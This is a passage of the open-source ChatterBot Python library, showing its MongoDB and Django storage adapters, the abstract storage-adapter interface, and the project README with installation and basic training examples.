statement entries. """ create_statements = [] for statement in statements: statement_data = statement.serialize() tag_data = list(set(statement_data.pop('tags', []))) statement_data['tags'] = tag_data if not statement.search_text: statement_data['search_text'] = self.tagger.get_text_index_string(statement.text) if not statement.search_in_response_to and statement.in_response_to: statement_data['search_in_response_to'] = self.tagger.get_text_index_string(statement.in_response_to) create_statements.append(statement_data) self.statements.insert_many(create_statements) def update(self, statement): data = statement.serialize() data.pop('id', None) data.pop('tags', None) data['search_text'] = self.tagger.get_text_index_string(data['text']) if data.get('in_response_to'): data['search_in_response_to'] = self.tagger.get_text_index_string(data['in_response_to']) update_data = { '$set': data } if statement.tags: update_data['$addToSet'] = { 'tags': { '$each': statement.tags } } search_parameters = {} if statement.id is not None: search_parameters['_id'] = statement.id else: search_parameters['text'] = statement.text search_parameters['conversation'] = statement.conversation update_operation = self.statements.update_one( search_parameters, update_data, upsert=True ) if update_operation.acknowledged: statement.id = update_operation.upserted_id return statement def get_random(self): """ Returns a random statement from the database """ from random import randint count = self.count() if count < 1: raise self.EmptyDatabaseException() random_integer = randint(0, count - 1) statements = self.statements.find().limit(1).skip(random_integer) return self.mongo_to_object(list(statements)[0]) def remove(self, statement_text): """ Removes the statement that matches the input text. """ self.statements.delete_one({'text': statement_text}) def drop(self): """ Remove the database. """ self.client.drop_database(self.database.name) File: chatterbot/storage/__init__.py from chatterbot.storage.storage_adapter import StorageAdapter from chatterbot.storage.django_storage import DjangoStorageAdapter from chatterbot.storage.mongodb import MongoDatabaseAdapter from chatterbot.storage.sql_storage import SQLStorageAdapter __all__ = ( 'StorageAdapter', 'DjangoStorageAdapter', 'MongoDatabaseAdapter', 'SQLStorageAdapter', ) File: chatterbot/storage/storage_adapter.py import logging from chatterbot import languages from chatterbot.tagging import PosLemmaTagger class StorageAdapter(object): """ This is an abstract class that represents the interface that all storage adapters should implement. """ def __init__(self, *args, **kwargs): """ Initialize common attributes shared by all storage adapters. :param str tagger_language: The language that the tagger uses to remove stopwords. """ self.logger = kwargs.get('logger', logging.getLogger(__name__)) Tagger = kwargs.get('tagger', PosLemmaTagger) self.tagger = Tagger(language=kwargs.get( 'tagger_language', languages.ENG )) def get_model(self, model_name): """ Return the model class for a given model name. model_name is case insensitive. """ get_model_method = getattr(self, 'get_%s_model' % ( model_name.lower(), )) return get_model_method() def get_object(self, object_name): """ Return the class for a given object name. object_name is case insensitive. """ get_model_method = getattr(self, 'get_%s_object' % ( object_name.lower(), )) return get_model_method() def get_statement_object(self): from chatterbot.conversation import Statement StatementModel = self.get_model('statement') Statement.statement_field_names.extend( StatementModel.extra_statement_field_names ) return Statement def count(self): """ Return the number of entries in the database. """ raise self.AdapterMethodNotImplementedError( 'The `count` method is not implemented by this adapter.' ) def remove(self, statement_text): """ Removes the statement that matches the input text. Removes any responses from statements where the response text matches the input text. """ raise self.AdapterMethodNotImplementedError( 'The `remove` method is not implemented by this adapter.' ) def filter(self, **kwargs): """ Returns a list of objects from the database. The kwargs parameter can contain any number of attributes. Only objects which contain all listed attributes and in which all values match for all listed attributes will be returned. :param page_size: The maximum number of records to load into memory at once when returning results. Defaults to 1000 :param order_by: The field name that should be used to determine the order that results are returned in. Defaults to None :param tags: A list of tags. When specified, the results will only include statements that have a tag in the provided list. Defaults to [] (empty list) :param exclude_text: If the ``text`` of a statement is an exact match for the value of this parameter the statement will not be included in the result set. Defaults to None :param exclude_text_words: If the ``text`` of a statement contains a word from this list then the statement will not be included in the result set. Defaults to [] (empty list) :param persona_not_startswith: If the ``persona`` field of a statement starts with the value specified by this parameter, then the statement will not be returned in the result set. Defaults to None :param search_text_contains: If the ``search_text`` field of a statement contains a word that is in the string provided to this parameter, then the statement will be included in the result set. Defaults to None """ raise self.AdapterMethodNotImplementedError( 'The `filter` method is not implemented by this adapter.' ) def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ raise self.AdapterMethodNotImplementedError( 'The `create` method is not implemented by this adapter.' ) def create_many(self, statements): """ Creates multiple statement entries. """ raise self.AdapterMethodNotImplementedError( 'The `create_many` method is not implemented by this adapter.' ) def update(self, statement): """ Modifies an entry in the database. Creates an entry if one does not exist. """ raise self.AdapterMethodNotImplementedError( 'The `update` method is not implemented by this adapter.' ) def get_random(self): """ Returns a random statement from the database. """ raise self.AdapterMethodNotImplementedError( 'The `get_random` method is not implemented by this adapter.' ) def drop(self): """ Drop the database attached to a given adapter. """ raise self.AdapterMethodNotImplementedError( 'The `drop` method is not implemented by this adapter.' ) class EmptyDatabaseException(Exception): def __init__(self, message=None): default = 'The database currently contains no entries. At least one entry is expected. You may need to train your chat bot to populate your database.' super().__init__(message or default) class AdapterMethodNotImplementedError(NotImplementedError): """ An exception to be raised when a storage adapter method has not been implemented. Typically this indicates that the method should be implement in a subclass. """ pass File: chatterbot/storage/django_storage.py from chatterbot.storage import StorageAdapter from chatterbot import constants class DjangoStorageAdapter(StorageAdapter): """ Storage adapter that allows ChatterBot to interact with Django storage backends. """ def __init__(self, **kwargs): super().__init__(**kwargs) self.django_app_name = kwargs.get( 'django_app_name', constants.DEFAULT_DJANGO_APP_NAME ) def get_statement_model(self): from django.apps import apps return apps.get_model(self.django_app_name, 'Statement') def get_tag_model(self): from django.apps import apps return apps.get_model(self.django_app_name, 'Tag') def count(self): Statement = self.get_model('statement') return Statement.objects.count() def filter(self, **kwargs): """ Returns a list of statements in the database that match the parameters specified. """ from django.db.models import Q Statement = self.get_model('statement') kwargs.pop('page_size', 1000) order_by = kwargs.pop('order_by', None) tags = kwargs.pop('tags', []) exclude_text = kwargs.pop('exclude_text', None) exclude_text_words = kwargs.pop('exclude_text_words', []) persona_not_startswith = kwargs.pop('persona_not_startswith', None) search_text_contains = kwargs.pop('search_text_contains', None) # Convert a single sting into a list if only one tag is provided if type(tags) == str: tags = [tags] if tags: kwargs['tags__name__in'] = tags statements = Statement.objects.filter(**kwargs) if exclude_text: statements = statements.exclude( text__in=exclude_text ) if exclude_text_words: or_query = [ ~Q(text__icontains=word) for word in exclude_text_words ] statements = statements.filter( *or_query ) if persona_not_startswith: statements = statements.exclude( persona__startswith='bot:' ) if search_text_contains: or_query = Q() for word in search_text_contains.split(' '): or_query |= Q(search_text__contains=word) statements = statements.filter( or_query ) if order_by: statements = statements.order_by(*order_by) for statement in statements.iterator(): yield statement def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ Statement = self.get_model('statement') Tag = self.get_model('tag') tags = kwargs.pop('tags', []) if 'search_text' not in kwargs: kwargs['search_text'] = self.tagger.get_text_index_string(kwargs['text']) if 'search_in_response_to' not in kwargs: if kwargs.get('in_response_to'): kwargs['search_in_response_to'] = self.tagger.get_text_index_string(kwargs['in_response_to']) statement = Statement(**kwargs) statement.save() tags_to_add = [] for _tag in tags: tag, _ = Tag.objects.get_or_create(name=_tag) tags_to_add.append(tag) statement.tags.add(*tags_to_add) return statement def create_many(self, statements): """ Creates multiple statement entries. """ Statement = self.get_model('statement') Tag = self.get_model('tag') tag_cache = {} for statement in statements: statement_data = statement.serialize() tag_data = statement_data.pop('tags', []) statement_model_object = Statement(**statement_data) if not statement.search_text: statement_model_object.search_text = self.tagger.get_text_index_string(statement.text) if not statement.search_in_response_to and statement.in_response_to: statement_model_object.search_in_response_to = self.tagger.get_text_index_string(statement.in_response_to) statement_model_object.save() tags_to_add = [] for tag_name in tag_data: if tag_name in tag_cache: tag = tag_cache[tag_name] else: tag, _ = Tag.objects.get_or_create(name=tag_name) tag_cache[tag_name] = tag tags_to_add.append(tag) statement_model_object.tags.add(*tags_to_add) def update(self, statement): """ Update the provided statement. """ Statement = self.get_model('statement') Tag = self.get_model('tag') if hasattr(statement, 'id'): statement.save() else: statement = Statement.objects.create( text=statement.text, search_text=self.tagger.get_text_index_string(statement.text), conversation=statement.conversation, in_response_to=statement.in_response_to, search_in_response_to=self.tagger.get_text_index_string(statement.in_response_to), created_at=statement.created_at ) for _tag in statement.tags.all(): tag, _ = Tag.objects.get_or_create(name=_tag) statement.tags.add(tag) return statement def get_random(self): """ Returns a random statement from the database """ Statement = self.get_model('statement') statement = Statement.objects.order_by('?').first() if statement is None: raise self.EmptyDatabaseException() return statement def remove(self, statement_text): """ Removes the statement that matches the input text. Removes any responses from statements if the response text matches the input text. """ Statement = self.get_model('statement') statements = Statement.objects.filter(text=statement_text) statements.delete() def drop(self): """ Remove all data from the database. """ Statement = self.get_model('statement') Tag = self.get_model('tag') Statement.objects.all().delete() Tag.objects.all().delete()
![ChatterBot: Machine learning in Python](https://i.imgur.com/b3SCmGT.png) # ChatterBot ChatterBot is a machine-learning based conversational dialog engine build in Python which makes it possible to generate responses based on collections of known conversations. The language independent design of ChatterBot allows it to be trained to speak any language. [![Package Version](https://img.shields.io/pypi/v/chatterbot.svg)](https://pypi.python.org/pypi/chatterbot/) [![Python 3.6](https://img.shields.io/badge/python-3.6-blue.svg)](https://www.python.org/downloads/release/python-360/) [![Django 2.0](https://img.shields.io/badge/Django-2.0-blue.svg)](https://docs.djangoproject.com/en/2.1/releases/2.0/) [![Requirements Status](https://requires.io/github/gunthercox/ChatterBot/requirements.svg?branch=master)](https://requires.io/github/gunthercox/ChatterBot/requirements/?branch=master) [![Build Status](https://travis-ci.org/gunthercox/ChatterBot.svg?branch=master)](https://travis-ci.org/gunthercox/ChatterBot) [![Documentation Status](https://readthedocs.org/projects/chatterbot/badge/?version=stable)](http://chatterbot.readthedocs.io/en/stable/?badge=stable) [![Coverage Status](https://img.shields.io/coveralls/gunthercox/ChatterBot.svg)](https://coveralls.io/r/gunthercox/ChatterBot) [![Code Climate](https://codeclimate.com/github/gunthercox/ChatterBot/badges/gpa.svg)](https://codeclimate.com/github/gunthercox/ChatterBot) [![Join the chat at https://gitter.im/chatterbot/Lobby](https://badges.gitter.im/chatterbot/Lobby.svg)](https://gitter.im/chatterbot/Lobby?utm_source=badge&utm_medium=badge&utm_content=badge) An example of typical input would be something like this: > **user:** Good morning! How are you doing? > **bot:** I am doing very well, thank you for asking. > **user:** You're welcome. > **bot:** Do you like hats? ## How it works An untrained instance of ChatterBot starts off with no knowledge of how to communicate. Each time a user enters a statement, the library saves the text that they entered and the text that the statement was in response to. As ChatterBot receives more input the number of responses that it can reply and the accuracy of each response in relation to the input statement increase. The program selects the closest matching response by searching for the closest matching known statement that matches the input, it then returns the most likely response to that statement based on how frequently each response is issued by the people the bot communicates with. ## Installation This package can be installed from [PyPi](https://pypi.python.org/pypi/ChatterBot) by running: ``` pip install chatterbot ``` ## Basic Usage ``` from chatterbot import ChatBot from chatterbot.trainers import ChatterBotCorpusTrainer chatbot = ChatBot('Ron Obvious') # Create a new trainer for the chatbot trainer = ChatterBotCorpusTrainer(chatbot) # Train the chatbot based on the english corpus trainer.train("chatterbot.corpus.english") # Get a response to an input statement chatbot.get_response("Hello, how are you today?") ``` # Training data ChatterBot comes with a data utility module that can be used to train chat bots. At the moment there is training data for over a dozen languages in this module. Contributions of additional training data or training data in other languages would be greatly appreciated. Take a look at the data files in the [chatterbot-corpus](https://github.com/gunthercox/chatterbot-corpus) package if you are interested in contributing. ``` from chatterbot.trainers import ChatterBotCorpusTrainer # Create a new trainer for the chatbot trainer = ChatterBotCorpusTrainer(chatbot) # Train based on the english corpus trainer.train("chatterbot.corpus.english") # Train based on english greetings corpus trainer.train("chatterbot.corpus.english.greetings") # Train based on the english conversations corpus trainer.train("chatterbot.corpus.english.conversations") ``` **Corpus contributions are welcome! Please make a pull request.** # [Documentation](https://chatterbot.readthedocs.io/) View the [documentation](https://chatterbot.readthedocs.io/) for ChatterBot on Read the Docs. To build the documentation yourself using [Sphinx](http://www.sphinx-doc.org/), run: ``` sphinx-build -b html docs/ build/ ``` # Examples For examples, see the [examples](https://github.com/gunthercox/ChatterBot/tree/master/examples) directory in this project's git repository. There is also an example [Django project using ChatterBot](https://github.com/gunthercox/ChatterBot/tree/master/examples), as well as an example [Flask project using ChatterBot](https://github.com/chamkank/flask-chatterbot). # History See release notes for changes https://github.com/gunthercox/ChatterBot/releases # Development pattern for contributors 1. [Create a fork](https://help.github.com/articles/fork-a-repo/) of the [main ChatterBot repository](https://github.com/gunthercox/ChatterBot) on GitHub. 2. Make your changes in a branch named something different from `master`, e.g. create a new branch `my-pull-request`. 3. [Create a pull request](https://help.github.com/articles/creating-a-pull-request/). 4. Please follow the [Python style guide for PEP-8](https://www.python.org/dev/peps/pep-0008/). 5. Use the projects [built-in automated testing](https://chatterbot.readthedocs.io/en/latest/testing.html). to help make sure that your contribution is free from errors. # License ChatterBot is licensed under the [BSD 3-clause license](https://opensource.org/licenses/BSD-3-Clause).